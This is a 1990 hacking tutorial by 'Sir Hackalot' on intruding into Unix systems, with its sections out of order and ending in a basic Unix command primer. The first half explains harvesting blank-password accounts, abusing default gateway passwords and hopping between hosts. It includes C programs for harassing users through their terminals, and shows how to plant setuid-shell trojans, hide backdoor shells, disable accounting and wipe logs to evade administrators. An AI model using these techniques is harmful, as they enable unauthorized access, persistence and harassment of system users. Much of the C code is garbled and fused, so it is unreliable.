the interrupt handler doesn't catch, and things like that. However, I do
not want to give away everything, and this was not meant for advanced Unix
Hackers, or atleast not the ones that are familiar with 68xxx, 80386 Unix
assembly language or anything. Now I will Talk about Internet.

--->>> InterNet <<<--- Why do I want to talk about InterNet? Well, because it is a prime example of a TCP/IP network, better known as a WAN (Wide-Area-Network). Now, mainly you will find BSD systems off of the Internet, or SunOS, for they are the most common. They may not be when System V, Rel 4.0, Version 2.0 comes out. Anyway, these BSDs/SunOSs like to make it easy to jump from one computer to another once you are logged in. What happens is EACH system has a "yello page password file". Better known as yppasswd. If you look in there, and see blank passwords you can use rsh, rlogin, etc.. to slip into that system. One system in particular I came across had a a yppasswd file where *300* users had blank passwords in the Yellow Pages. Once I got in on the "test" account, ALL I had to do was select who I wanted to be, and do: rlogin -l user (sometimes -n). Then it would log me onto the system I was already on, through TCP/IP. However, when you do this, remember that the yppasswd only pertains to the system you are on at the time. To find accounts, you could find the yppasswd file and do: % cat yppasswd | grep :: Or, if you can't find yppasswd.. % ypcat passwd | grep :: On ONE system (which will remain confidential), I found the DAEMON account left open in the yppasswd file. Not bad. Anyway, through one system on the internet, you can reach many. Just use rsh, or rlogin, and look in the file: /etc/hosts for valid sites which you can reach. If you get on to a system, and rlogin to somewhere else, and it asks for a password, that just means one of two things: A. Your account that you have hacked on the one computer is on the target computer as well. Try to use the same password (if any) you found the hacked account to have. If it is a default, then it is definitly on the other system, but good luck... B. rlogin/rsh passed your current username along to the remote system, so it was like typing in your login at a "login: " prompt. You may not exist on the other machine. Try "rlogin -l login_name", or rlogin -n name.. sometimes, you can execute "rwho" on another machine, and get a valid account. Some notes on Internet servers. There are "GATEWAYS" that you can get into that will allow access to MANY internet sites. They are mostly run off a modified GL/1 or GS/1. No big deal. They have help files. However, you can get a "privilged" access on them, which will give you CONTROL of the gateway.. You can shut it down, remove systems from the Internet, etc.. When you request to become privileged, it will ask for a password. There is a default. The default is "system". I have come across *5* gateways with the default password. Then again, DECNET has the same password, and I have come across 100+ of those with the default privileged password. CERT Sucks. a Gateway that led to APPLE.COM had the default password. Anyone could have removed apple.com from the internet. Be advised that there are many networks now that use TCP/IP.. Such as BARRNET, LANET, and many other University networks. --** Having Fun **-- Now, if nothing else, you should atleast have some fun. No, I do not mean go trashing hardrives, or unlinking directories to take up inodes, I mean play with online users. There are many things to do. Re-direct output to them is the biggie. Here is an example: $ who loozer tty1 sirhack tty2 $ banner You Suck >/dev/tty1
That sent the output to loozer. The TTY1 is where I/O is being performed
to his terminal (usually a modem if it is a TTY). You can repetitiously
banner him with a do while statement in shell, causing him to logoff. Or
you can get sly, and just screw with him. Observe this C program:


int argc;
char *argument[];
int handle;
char *pstr,*olm[80];
char *devstr = "/dev/";
int acnt = 2;
FILE *strm;
pstr = "";
if (argc == 1) {
printf("OL (OneLiner) Version 1.00 \n");
printf("By Sir Hackalot [PHAZE]\n");
printf("\nSyntax: ol tty message\n");
printf("Example: ol tty01 You suck\n");
printf("OL (OneLiner) Version 1.0\n");
printf("By Sir Hackalot [PHAZE]\n");
if (argc == 2) {
printf("\nDummy! You forgot to Supply a ONE LINE MESSAGE\n");
printf("Enter one Here => ");
printf("Sending to: [%s]\n",pstr);
strm = fopen(pstr,"a");
if (strm == NULL) {
printf("Error writing to: %s\n",pstr);
printf("Cause: No Write Perms?\n");
if (argc == 2) {
if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s): \n",logname());
printf("Message Sent.\n");
if (argc > 2) {
if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s):\n",logname());
while (acnt <= argc - 1) { fprintf(strm,"%s ",argument[acnt]); acnt++; } fclose(strm); printf("Message sent!\n"); exit(0); } } What the above does is send one line of text to a device writeable by you in /dev. If you try it on a user named "sirhack" it will notify sirhack of what you are doing. You can supply an argument at the command line, or leave a blank message, then it will prompt for one. You MUST supply a Terminal. Also, if you want to use ?, or *, or (), or [], you must not supply a message at the command line, wait till it prompts you. Example: $ ol tty1 You Suck! OL (OneLiner) Version 1.00 by Sir Hackalot [PHAZE] Sending to: [/dev/tty1] Message Sent! $ Or.. $ ol tty1 OL (OneLiner) Version 1.00 by Sir Hackalot [PHAZE] Dummy! You Forgot to Supply a ONE LINE MESSAGE! Enter one here => Loozer! Logoff (NOW)!! ^G^G
Sending to: [/dev/tty1]
Message Sent!

You can even use it to fake messages from root. Here is another:

* Hose another user


#define NMAX sizeof(ubuf.ut_name)

struct utmp ubuf;
struct termio oldmode, mode;
struct utsname name;
int yn;
int loop = 0;
char *realme[50] = "Unknown";
char *strcat(), *strcpy(), me[50] = "???", *him, *mytty, histty[32];
char *histtya, *ttyname(), *strrchr(), *getenv();
int signum[] = {SIGHUP, SIGINT, SIGQUIT, 0}, logcnt, eof(), timout();
FILE *tf;

main(argc, argv)
int argc;
char *argv[];
register FILE *uf;
char c1, lastc;
int goodtty = 0;
long clock = time((long *) 0);
struct tm *localtime();
struct tm *localclock = localtime( &clock );
struct stat stbuf;
char psbuf[20], buf[80], window[20], junk[20];
FILE *pfp, *popen();

if (argc < him =" argv[1];"> 2)
histtya = argv[2];
if ((uf = fopen("/etc/utmp", "r")) == NULL) {
printf("cannot open /etc/utmp\n");
if (me == NULL) {
printf("Can't find your login name\n");
mytty = ttyname(2);
if (mytty == NULL) {
printf("Can't find your tty\n");
if (stat(mytty, &stbuf) < histtya =" strrchr(histtya," logcnt="="0)" histtya="="0"> 1) {
printf("%s logged more than once\nwriting to %s\n", him, histty+5);
if (access(histty, 0) < 0) { printf("No such tty? [%s]\n",histty); exit(1); } signal(SIGALRM, timout); alarm(5); if ((tf = fopen(histty, "w")) == NULL) goto perm; alarm(0); if (fstat(fileno(tf), &stbuf) < 0) goto perm; if (geteuid() != 0 && (stbuf.st_mode&02) == 0) goto perm; ioctl(0, TCGETA, &oldmode); /* save tty state */ ioctl(0, TCGETA, &mode); sigs(eof); uname(&name); if (strcmp(him,"YOURNAMEHERE") == 0) yn = 1; if (yn == 1 ) { fprintf(tf, "\r(%s attempted to HOSE You with NW)\r\n",me); fclose(tf); printf("Critical Error Handler: %s running conflicting process\n",him); exit(1); } fflush(tf); mode.c_cc[4] = 1; mode.c_cc[5] = 0; mode.c_lflag &= ~ICANON; ioctl(0, TCSETAW, &mode); lastc = '\n'; printf("Backspace / Spin Cursor set lose on: %s\n",him); while (loop == 0) { c1 = '\b'; write(fileno(tf),&c1,1); sleep(5); fprintf(tf,"\\\b|\b/\b-\b+\b"); fflush(tf); } perm: printf("Write Permissions denied!\n"); exit(1); } timout() { printf("Timeout opening their tty\n"); exit(1); } eof() { printf("Bye..\n"); ioctl(0, TCSETAW, &oldmode); exit(0); } ex() { register i; sigs(SIG_IGN); i = fork(); if (i < 0) { printf("Try again\n"); goto out; } if (i == 0) { sigs((int (*)())0); execl(getenv("SHELL")?getenv("SHELL"):"/bin/sh","sh","-t",0); exit(0); } while(wait((int *)NULL) != i) ; printf("!\n"); out: sigs(eof); } sigs(sig) int (*sig)(); { register i; for (i=0; signum[i]; i++) signal(signum[i], sig); } What the above is, is a modified version of the standard write command. What it does, is spin the cursor once, then backspace once over the screen of the user it is run on. All though, it does not physically affect input, the user thinks it does. therefore, he garbles input. The sleep(xx) can be changed to make the stuff happen more often, or less often. If you put your login name in the "YOURNAMEHERE" slot, it will protect you from getting hit by it, if someone off a Public access unix leeches the executable from your directory. You could make a shorter program that does almost the same thing, but you have to supply the terminal, observe: /* Backspace virus, by Sir Hackalot [Phaze] */ #include
char *argv[];
int argc;
int x = 1;
char *device = "/dev/";
FILE *histty;
if (argc == 1) {
printf("Bafoon. Supply a TTY.\n");
/* Make the filename /dev/tty.. */
histty = fopen(device,"a");
if (histty == NULL) {
printf("Error opening/writing to tty. Check their perms.\n");
printf("BSV - Backspace virus, By Sir Hackalot.\n");
printf("The Sucker on %s is getting it!\n",device);
while (x == 1) {

Thats all there is to it. If you can write to their tty, you can use this on
them. It sends two backspaces to them every approx. 5 seconds. You
should run this program in the background. (&). Here is an example:

$ who
sirhack tty11
loozer tty12
$ bsv tty12&
[1] 4566
BSV - Backspace virus, by Sir Hackalot
The Sucker on /dev/tty12 is getting it!

Now, it will keep "attacking" him, until he loggs of, or you kill the process
(which was 4566 -- when you use &, it gives the pid [usually]).

** Note *** Keep in mind that MSDOS, and other OP systems use The CR/LF
method to terminate a line. However, the LF terminates a line in Unix.
you must STRIP CR's on an ascii upload if you want something you upload
to an editor to work right. Else, you'll see a ^M at the end of every
line. I know that sucks, but you just have to compensate for it.

I have a number of other programs that annoy users, but that is enough to
get your imagination going, provided you are a C programmer. You can annoy
users other ways. One thing you can do is screw up the user's mailbox.
The way to do this is to find a binary file (30k or bigger) on the system
which YOU have access to read. then, do this:

$ cat binary_file | mail loozer


$ mail loozer <>/dev/tty12
It may pause for a while while it outputs it. If you want to resume what
you were doing instantly, do:
$ cat binary_file >/dev/tty12&
[1] 4690
And he will probably logoff. You can send the output of anything to his
terminal. Even what YOU do in shell. Like this:
$ sh >/dev/tty12
You'll get your prompts, but you won't see the output of any commands, he
$ ls
$ banner Idiot!
$ echo Dumbass!
until you type in exit, or hit ctrl-d.

There are many many things you can do. You can fake a "write" to someone
and make them think it was from somewhere on the other side of hell. Be

When you are looking for things to do, look for holes, or try to get
someone to run a trojan horse that makes a suid shell. If you get
someone to run a trojan that does that, you can run the suid, and log their
ass off by killing their mother PID. (kill -9 whatever). Or, you can
lock them out by adding "kill -1 0" to their .profile. On the subject of
holes, always look for BAD suid bits. On one system thought to be invincible
I was able to read/modify everyone's mail, because I used a mailer that had
both the GroupID set, and the UserID set. When I went to shell from it,
the program instantly changed my Effective ID back to me, so I would not be
able to do anything but my regular stuff. But it was not designed to change
the GROUP ID back. The sysop had blundered there. SO when I did an ID
I found my group to be "Mail". Mailfiles are readble/writeable by the
user "mail", and the group "mail". I then set up a sgid (set group id) shell
to change my group id to "mail" when I ran it, and scanned important mail,
and it got me some good info. So, be on the look out for poor permissions.

Also, after you gain access, you may want to keep it. Some tips on doing so
1. Don't give it out. If the sysadm sees that joeuser logged in 500
times in one night....then....
2. Don't stay on for hours at a time. They can trace you then. Also
they will know it is irregular to have joeuser on for 4 hours
after work.
3. Don't trash the system. Don't erase important files, and don't
hog inodes, or anything like that. Use the machine for a specific
purpose (to leech source code, develop programs, an Email site).
Dont be an asshole, and don't try to erase everything you can.
4. Don't screw with users constantly. Watch their processes and
run what they run. It may get you good info (snoop!)
5. If you add an account, first look at the accounts already in there
If you see a bunch of accounts that are just 3 letter abbrv.'s,
then make yours so. If a bunch are "cln, dok, wed" or something,
don't add one that is "joeuser", add one that is someone's
full initials.

6. When you add an account, put a woman's name in for the
description, if it fits (Meaning, if only companies log on to the
unix, put a company name there). People do not suspect hackers
to use women's names. They look for men's names.
7. Don't cost the Unix machine too much money. Ie.. don't abuse an
outdial, or if it controls trunks, do not set up a bunch of dial
outs. If there is a pad, don't use it unless you NEED it.
8. Don't use x.25 pads. Their usage is heavily logged.
9. Turn off acct logging (acct off) if you have the access to.
Turn it on when you are done.
10. Remove any trojan horses you set up to give you access when you
get access.
11. Do NOT change the MOTD file to say "I hacked this system" Just
thought I'd tell you. Many MANY people do that, and lose access
within 2 hours, if the unix is worth a spit.
12. Use good judgement. Cover your tracks. If you use su, clean
up the sulog.
13. If you use cu, clean up the cu_log.
14. If you use the smtp bug (wizard/debug), set up a uid shell.
15. Hide all suid shells. Here's how:
goto /usr
(or any dir)
# mkdir ".. "
# cd ".. "
# cp /bin/sh ".whatever"
# chmod a+s ".whatever"
The "" are NEEDED to get to the directory .. ! It will not show
up in a listing, and it is hard as hell to get to by sysadms if
you make 4 or 5 spaces in there (".. "), because all they will
see in a directory FULL list will be .. and they won't be able to
get there unless they use "" and know the spacing. "" is used
when you want to do literals, or use a wildcard as part of a file
16. Don't hog cpu time with password hackers. They really don't work

17. Don't use too much disk space. If you archieve something to dl,
dl it, then kill the archieve.
18. Basically -- COVER YOUR TRACKS.

Some final notes:

Now, I hear lots of rumors and stories like "It is getting harder to get
into systems...". Wrong. (Yo Pheds! You reading this??). It IS true
when you are dealing with WAN's, such as telenet, tyment, and the Internet,
but not with local computers not on those networks. Here's the story:

Over the past few years, many small companies have sprung up as VARs
(Value Added Resellers) for Unix and Hardware, in order to make a fast
buck. Now, these companies fast talk companies into buying whatever,
and they proceed in setting up the Unix. Now, since they get paid by
the hour usaually when setting one up, they spread it out over days....
during these days, the system is WIDE open (if it has a dialin). Get
in and add yourself to passwd before the seal it off (if they do..).
Then again, after the machine is set up, they leave the defaults on the
system. Why? The company needs to get in, and most VARs cannot use
unix worth a shit, all they know how to do is set it up, and that is ALL.
Then, they turn over the system to a company or business that USUALLY
has no-one that knows what they hell they are doing with the thing, except
with menus. So, they leave the system open to all...(inadvertedly..),
because they are not competant. So, you could usually get on, and create
havoc, and at first they will think it is a bug.. I have seen this
happen ALL to many times, and it is always the same story...
The VAR is out for a fast buck, so they set up the software (all they know
how to do), and install any software packages ordered with it (following
the step by step instructions). Then they turn it over to the business
who runs a word processor, or database, or something, un aware that a
"shell" or command line exists, and they probably don't even know root does.
So, we will see more and more of these pop up, especially since AT&T is
now bundling a version of Xwindows with their new System V, and Simultask...
which will lead to even more holes. You'll find systems local to you
that are easy as hell to get into, and you'll see what I mean. These
VARs are really actually working for us. If a security problem arises
that the business is aware of, they call the VAR to fix it... Of course,
the Var gets paid by the hour, and leaves something open so you'll get in
again, and they make more moolahhhh.

You can use this phile for whatever you want. I can't stop you. Just
to learn unix (heh) or whatever. But its YOUR ass if you get caught.
Always consider the penalties before you attempt something. Sometimes
it is not worth it, Sometimes it is.

This phile was not meant to be comprehensive, even though it may seem like
it. I have left out a LOT of techniques, and quirks, specifically to get
you to learn SOMETHING on your own, and also to retain information so
I will have some secrets. You may pass this file on, UNMODIFIED, to any
GOOD H/P BBS. Sysops can add things to the archieve to say where
it was DL'd from, or to the text viewer for the same purpose. This is
Copywrited (haha) by Sir Hackalot, and by PHAZE, in the year 1990.

The accounts root, mountfsys, umountfsys, install, and sometimes sync are
root level accounts, meaning they have sysop power, or total power. Other
logins are just "user level" logins meaning they only have power over what
files/processes they own. I'll get into that later, in the file permissions
section. The REBOOT login is what as known as a command login, which just
simply doesn't let you into the operating system, but executes a program
assigned to it. It usually does just what it says, reboot the system. It
may not be standard on all UNIX systems, but I have seen it on UNISYS unixes
and also HP/UX systems [Hewlett Packard Unixes]. So far, these accounts have
not been passworded [reboot], which is real stupid, if you ask me.


There are "command logins", which, like reboot, execute a command then log
you off instead of letting you use the command interpreter. BSD is notorious
for having these, and concequently, so does MIT's computers. Here are some:

rwho - show who is online
finger - same
who - same

These are the most useful, since they will give the account names that are
online, thus showing you several accounts that actually exist.


When you get an invalid Account name / invalid password, or both, you will
get some kind of error. Usually it is the "login incorrect" message. When
the computer tells you that, you have done something wrong by either enterring
an invalid account name, or a valid account name, but invalid password. It
does not tell you which mistake you made, for obvious reasons. Also,
when you login incorrectly, the error log on the system gets updated, letting
the sysops(s) know something is amiss.

Another error is "Cannot change to home directory" or "Cannot Change
Directory." This means that no "home directory" which is essentially the
'root' directory for an account, which is the directory you start off in.
On DOS, you start in A:\ or C:\ or whatever, but in UNIX you start in
/homedirectory. [Note: The / is used in directories on UNIX, not a \ ].
Most systems will log you off after this, but some tell you that they will
put you in the root directory [ '/'].

Another error is "No Shell". This means that no "shell" was defined
for that particular account. The "shell" will be explained later. Some
systems will log you off after this message. Others will tell you that they
will use the regular shell, by saying "Using the bourne shell", or "Using sh"

Accounts In General :

This section is to hopefully describe to you the user structure
in the UNIX environment.
Ok, think of UNIX having two levels of security: absolute power,
or just a regular user. The ones that have absolute power are those users
at the root level. Ok, now is the time to think in numbers. Unix associates
numbers with account names. each account will have a number. Some will have
the same number. That number is the UID [user-id] of the account. the root
user id is 0. Any account that has a user id of 0 will have root access.
Unix does not deal with account names (logins) but rather the number
associated with them. for instance, If my user-id is 50, and someone else's
is 50, with both have absolute power of each other, but no-one else.

Shells :

A shell is an executable program which loads and runs when a user
logs on, and is in the foreground. This "shell" can be any executable prog-
ram, and it is defined in the "passwd" file which is the userfile. Each
login can have a unique "shell". Ok. Now the shell that we usually will work
with is a command interpreter. A command interpreter is simply something
like MSDOS's COMMAND.COM, which processes commands, and sends them to the
kernel [operating system]. A shell can be anything, as I said before,
but the one you want to have is a command interpreter. Here are the
usual shells you will find:

sh - This is the bourne shell. It is your basic Unix "COMMAND.COM". It has
a "script" language, as do most of the command interpreters on Unix sys-

csh - This is the "C" shell, which will allow you to enter "C" like commands.
ksh - this is the korn shell. Just another command interpreter.
tcsh - this is one, which is used at MIT I believe. Allows command editing.
vsh - visual shell. It is a menu driven deal. Sorta like.. Windows for DOS
rsh - restricted shell OR remote shell. Both Explained later.
There are many others, including "homemade " shells, which are
programs written by the owner of a unix, or for a specific unix, and they
are not standard. Remember, the shell is just the program you get to use
and when it is done executing, you get logged off. A good example of a
homemade shell is on Eskimo North, a public access Unix. The shell
is called "Esh", and it is just something like a one-key-press BBS,
but hey, its still a shell. The Number to eskimo north is 206-387-3637.
[206-For-Ever]. If you call there, send Glitch Lots of mail.
Several companies use Word Processors, databases, and other things
as a user shell, to prevent abuse, and make life easier for unskilled computer
operators. Several Medical Hospitals use this kind of shell in Georgia,
and fortunatly, these second rate programs leave major holes in Unix.
Also, a BBS can be run as a shell. Check out Jolnet [312]-301-2100, they
give you a choice between a command interpreter, or a BBS as a shell.
WHen you have a command interpreter, the prompt is usually a:
when you are a root user the prompt is usually a:
The variable, PS1, can be set to hold a prompt.
For instance, if PS1 is "HI:", your prompt will be:


SPecial Characters, ETc:

Control-D : End of file. When using mail or a text editor, this will end
the message or text file. If you are in the shell and hit control-d you get
logged off.

Control-J: On some systems, this is like the enter key.
@ : Is sometimes a "null"
? : This is a wildcard. This can represent a letter. If you specified
something at the command line like "b?b" Unix would look for bob,bib,bub,
and every other letter/number between a-z, 0-9.
* : this can represent any number of characters. If you specified a "hi*"
it would use "hit", him, hiiii, hiya, and ANYTHING that starts with
hi. "H*l" could by hill, hull, hl, and anything that starts with an
H and ends with an L.

[] - The specifies a range. if i did b[o,u,i]b unix would think: bib,bub,bob
if i did: b[a-d]b unix would think: bab,bbb,bcb,bdb. Get the idea? The
[], ?, and * are usually used with copy, deleting files, and directory

EVERYTHING in Unix is CASE sensitive. This means "Hill" and "hill" are not
the same thing. This allows for many files to be able to be stored, since
"Hill" "hill" "hIll" "hiLl", etc. can be different files. So, when using
the [] stuff, you have to specify capital letters if any files you are dealing
with has capital letters. Most everything is lower case though.

Commands to use:

Now, I will rundown some of the useful commands of Unix. I will act
as if I were typing in the actual command from a prompt.

ls - this is to get a directory. With no arguments, it will just print out
file names in either one column or multi-column output, depending on the
ls program you have access to.

$ ls
the -l switch will give you extended info on the files.
$ ls -l
rwx--x--x sirhack sirh 10990 runme
and so on....

the "rwx--x--x" is the file permission. [Explained Later]
the "sirhack sirh" is the owner of the file/group the file is in.
sirhack = owner, sirh = user-group the file is in [explained later]
the 10990 is the size of the file in bytes.
"runme" is the file name.
The format varies, but you should have the general idea.

cat - this types out a file onto the screen. should be used on text files.
only use it with binary files to make a user mad [explained later]
$ cat note.txt
This is a sample text file!

cd - change directory . You do it like this: cd /dir/dir1/dir2/dirn.
the dir1/etc.... describes the directory name. Say I want to get
to the root directory.
$ cd /
*ok, I'm there.*
$ ls
all of the above are directories, lets say.
$ cd /usr
$ ls
$ cd /usr/sirhack
$ ls
ok, now, you do not have to enter the full dir name. if you are in
a directory, and want to get into one that is right there [say "src"], you
can type "cd src" [no "/"]. Instead of typing "cd /usr/sirhack/src" from the
sirhack dir, you can type "cd src"

cp - this copies a file. syntax for it is "cp fromfile tofile"
$ cp runme runme2
$ ls
Full pathnames can be included, as to copy it to another directory.
$ cp runme /usr/datwiz/runme

mv - this renames a file. syntax "mv oldname newname"
$ mv runme2 runit
$ ls
files can be renamed into other directories.
$ mv runit /usr/datwiz/run
$ ls
$ ls /usr/datwiz

pwd - gives current directory
$ pwd
$ cd src
$ pwd
$ cd ..
$ pwd
[ the ".." means use the name one directory back. ]
$ cd ../datwiz
[translates to cd /usr/datwiz]
$ pwd
$ cd $home
[goto home dir]
$ pwd

rm - delete a file. syntax "rm filename" or "rm -r directory name"
$ rm note.text
$ ls

write - chat with another user. Well, "write" to another user.
syntax: "write username"
$ write scythian
scythian has been notified
Hey Scy! What up??
Message from scythian on tty001 at 17:32
me: So, hows life?
scy: ok, I guess.
me: gotta go finish this text file.
scy: ok
me: control-D [to exit program]

who [w,who,whodo] - print who is online
$ who
login term logontime
scythian + tty001 17:20
phiberO + tty002 15:50
sirhack + tty003 17:21
datawiz - tty004 11:20
glitch - tty666 66:60
the "who" commands may vary in the information given. a "+" means
you can "write" to their terminal, a "-" means you cannot.

man - show a manual page entry. syntax "man command name" This is a help
program. If you wanted to know how to use... "who" you'd type
$ man who
WHO(1) xxx......
and it would tell you.

stty - set your terminal characteristics. You WILL have to do "man stty"
since each stty is different, it seems like.
an example would be:
$ stty -parenb
to make the data params N,8,1. A lot of Unixes operate at
e,7,1 by default.

sz,rz - send and recieve via zmodem
rx,sx - send / recieve via xmodem
rb,sb - send via batch ymodem. These 6 programs may or may not be on a unix.
umodem - send/recieve via umodem.
$ sz filename
ready to send...
$ rz filename
please send your file....

ed - text editor. Usage "ed filename" to create a file that doesn't
exist, just enter in "ed filename"
some versions of ed will give you a prompt, such as "*" others will not
$ ed newtext
* a
This is line 1
This is line 2
* 1 [to see line one]
This is line 1
* a [keep adding]
This is line 3
*0a [add after line 0]
This is THE first line
This is THE first line
This is line 1
This is line 2
This is line 3
* w
* q
The 71 is number of bytes written.
a = append
l = list
# = print line number
w - write
l fname = load fname
s fname = save to fname
w = write to current file
q = quit
mesg - turn write permissions on or off to your terminal (allow chat)
format "mesg y" or "mesg n"
cc - the C compiler. don't worry about this one right now.
chmod - change mode of a file. Change the access in other words.
syntax: "chmod mode filename"
$ chmod a+r newtext
Now everyone can read newtext.
a = all
r = read. This will be explained further in the File System section.

chown - change the owner of a file.
syntax: "chown owner filename"
$ chown scythian newtext
chgrp - change the group [explained later] of a file.
syntax: "chgrp group file"
$ chgrp root runme
finger - print out basic info on an account. Format: finger username
grep - search for patterns in a file. syntax: "grep pattern file"
$ grep 1 newtext
This is Line 1
$ grep THE newtext
This is THE first line
$ grep "THE line 1" newtext

mail - This is a very useful utility. Obviously, you already know what it
is by its name. There are several MAIL utilities, such as ELM, MUSH
and MSH, but the basic "mail" program is called "mail". The usage
"mail username@address" or
"mail username"
or "mail addr1!addr2!addr3!user"

"mail username@address" - This is used to send mail to someone on
another system, which is usually another UNIX, but some DOS machines and some
VAX machines can recieve Unix Mail. When you use "mail user@address" the
system you are on MUST have a "smart mailer" [known as smail], and must
have what we call system maps. The smart mailer will find the "adress" part
of the command and expand it into the full pathname usually. I could look
like this: mail phiber@optik
then look like this to the computer:

mail sys1!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber

Do not worry about it, I was merely explaining the principal of the thing.
Now, if there is no smart mailer online, you'll have to know the FULL path
name of the person you wish to mail to. For Instance, I want to mail to
.. phiber. I'd do this if there were no smart mailer:

$ mail sys!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber

Hey Guy. Whats up? Well, gotta go. Nice long message huh?
Then, when he got it, there would be about 20 lines of information, with
like a post mark from every system my message went thru, and the "from" line
would look like so:

From optik!sirhacksys!att.com!sc1!sbell!pacbell!unisys!sys!sirhack

Now, for local mailing, just type in "mail username" where username
is the login you want to send mail to. Then type in your message. Then
end it with a control-D.

To read YOUR mail, just type in mail. IE:

$ mail

From scythian ............
To sirhack ............
Subject: Well....


The dots represent omitted crap. Each Mail program makes its own headings.
That ? is a prompt. At this prompt I can type:

d - delete
f username - forward to username
w fname - write message to a file named fname
s fname - save message with header into file
q - quit / update mail
x - quit, but don't change a thing
m username - mail to username
r - reply
[enter] - read next message
+ - go forward one message
- : go back one
h - print out message headers that are in your mailbox.

There are others, to see them, you'd usually hit '?'.


If you send mail to someone not on your system, you will have to wait longer
for a reply, since it is just as a letter. A "postman" has to pick it up.
The system might call out, and use UUCP to transfer mail. Usually, uucp
accounts are no good to one, unless you have uucp available to intercept mail.

ps - process. This command allows you to see what you are actually doing
in memory. Everytime you run a program, it gets assigned a Process Id number
(PID), for accounting purposes, and so it can be tracked in memory, as
well as shut down by you, or root. usually, the first thing in a process
list given by "ps" is your shell name. Say I was logged in under sirhack,
using the shell "csh" and running "watch scythian". The watch program would
go into the background, meaning I'd still be able to do things while it was
$ ps
122 001 ksh
123 001 watch
That is a shortened PS. That is the default listing [a brief one].
The TTY column represents the "tty" [i/o device] that the process is being
run from. This is only useful really if you are using layers (don't worry)
or more than one person is logged in with the same account name. Now,
"ps -f" would give a full process listing on yourself, so instead of
seeing just plain ole "watch" you'd most likely see "watch scythian"

kill - kill a process. This is used to terminate a program in memory obvio-
ously. You can only kill processes you own [ones you started], unless you
are root, or your EUID is the same as the process you want to kill.
(Will explain euid later). If you kill the shell process, you are logged
off. By the same token, if you kill someone else's shell process, they
are logged off. So, if I said "kill 122" I would be logged off. However,
kill only sends a signal to UNIX telling it to kill off a process. If
you just use the syntax "kill pid" then UNIX kills the process WHEN it feels
like it, which may be never. So, you can specify urgency! Try "kill -num pid"
Kill -9 pid is a definite kill almost instantly. So if I did this:
$ kill 122
$ kill 123
$ ps
122 001 ksh
123 001 watch
$ kill -9 123
[123]: killed
$ kill -9 122

Also, you can do "kill -1 0" to kill your shell process to log yourself off.
This is useful in scripts (explained later).

Shell Programmin'

Shell Programming is basically making a "script" file for the
standard shell, being sh, ksh, csh, or something on those lines. Its
like an MSDOS batch file, but more complex, and more Flexible.
This can be useful in one aspect of hacking.

First, lets get into variables. Variables obviously can be assigned
values. These values can be string values, or numberic values.


That would assign 1 to the variable named "number".

string=Hi There
string="Hi There"

Both would assign "Hi there" to a variable.

Using a variable is different though. When you wish to use a variable
you must procede it with a dollar ($) sign. These variables can
be used as arguments in programs. When I said that scripts are
like batch files, I meant it. You can enter in any name of a program
in a script file, and it will execute it. Here is a sample script.


ps $arg1 $arg2

echo $counter

That script would translate to "ps -uf scythian" then would print
"1" after that was finished. ECHO prints something on the screen
whether it be numeric, or a string constant.

Other Commands / Examples:

read - reads someting into a variable. format : read variable . No dollar
sign is needed here! If I wwanted to get someone's name, I could

echo "What is your name?"
read hisname
echo Hello $hisname

What is your name?
Sir Hackalot
Hello Sir Hackalot

Remember, read can read numeric values also.

trap - This can watch for someone to use the interrupt character. (Ctrl-c)
format: trap "command ; command ; command ; etc.."
trap "echo 'Noway!! You are not getting rid o me that easy' ; echo
'You gotta see this through!'"

Now, if I hit control-c during the script after this statement was
executed, I'd get:
Noway!! You are not getting rid of me that easy
You gotta see this through!

exit : format :exit [num] This exists the shell [quits] with return
code of num.


Case execution is like a menu choice deal. The format of the command
or structure is :
case variable in
1) command;
2) command;
*) command;;
Each part can have any number of commands. The last command however
must have a ";;". Take this menu:

echo "Please Choose:"
echo "(D)irectory (L)ogoff (S)hell"
read choice
case $choice in

D) echo "Doing Directory...";
ls -al ;;
L) echo Bye;
kill -1 0;;
S) exit;;
*) Echo "Error! Not a command";;

The esac marks the end of a case function. It must be after the
LAST command.


Ok, loops. There are two loop functins. the for loops, and the

repeat looks like this: repeat something somethin1 somethin2
this would repeat a section of your script for each "something".
say i did this:
repeat scythian sirhack prophet

I may see "scythian" then sirhack then prophet on my screen.

The for loop is defined as "for variable in something

an example:
for counter in 1 2 3
echo $counter

That would print out 1 then 2 then 3.

Using TEST
The format: Test variable option variable

The optios are:
-eq =
-ne <> (not equal)
-gt >
-lt < -ge >=
-le <= for strings its: = for equal != for not equal. If the condition is true, a zero is returned. Watch: test 3 -eq 3 that would be test 3 = 3, and 0 would be returned. EXPR ---- This is for numeric functions. You cannot simply type in echo 4 + 5 and get an answer most of the time. you must say: expr variable [or number] operator variable2 [or number] the operators are: + add - subtract * multiply / divide ^ - power (on some systems) example : expr 4 + 5 var = expr 4 + 5 var would hold 9. On some systems, expr sometimes prints out a formula. I mean, 22+12 is not the same as 22 + 12. If you said expr 22+12 you would see: 22+12 If you did expr 22 + 12 you'd see: 34 SYSTEM VARIABLES ---------------- These are variables used by the shell, and are usually set in the system wide .profile [explained later]. HOME - location of your home directory. PS1 - The prompt you are given. usually $ . On BSD its usually & PATH - This is the search path for programs. When you type in a program to be run, it is not in memory; it must be loaded off disk. Most commands are not in Memory like MSDOS. If a program is on the search path, it may be executed no matter where you are. If not, you must be in the directory where the program is. A path is a set of directories basically, seperated by ":"'s. Here is a typical search path: :/bin:/etc:/usr/lbin:$HOME: When you tried to execute a program, Unix would look for it in /bin, /etc, /usr/lbin, and your home directory, and if its not found, an error is spewed out. It searches directories in ORDER of the path. SO if you had a program named "sh" in your home directory, and typed in "sh", EVEN if you were in your home dir, it would execute the one in /bin. So, you must set your paths wisely. Public access Unixes do this for you, but systems you may encounter may have no path set. TERM - This is your terminal type. UNIX has a library of functions called "CURSES" which can take advantage of any terminal, provided the escape codes are found. You must have your term set to something if you run screen oriented programs. The escape codes/names of terms are found in a file called TERMCAP. Don't worry about that. just set your term to ansi or vt100. CURSES will let you know if it cannot manipulate your terminal emulation. ------------------- The C compiler ------------------- This Will be BRIEF. Why? Becuase if you want to learn C, go buy a book. I don't have time to write another text file on C, for it would be huge. Basically, most executables are programmed in C. Source code files on unix are found as filename.c . To compile one, type in "cc filename.c". Not all C programs will compile, since they may depend on other files not there, or are just modules. If you see a think called "makefile" you can usually type in just "make" at the command prompt, and something will be compiled, or be attempted to compile. When using make or CC, it would be wise to use the background operand since compiling sometimes takes for ever. IE: $ cc login.c& 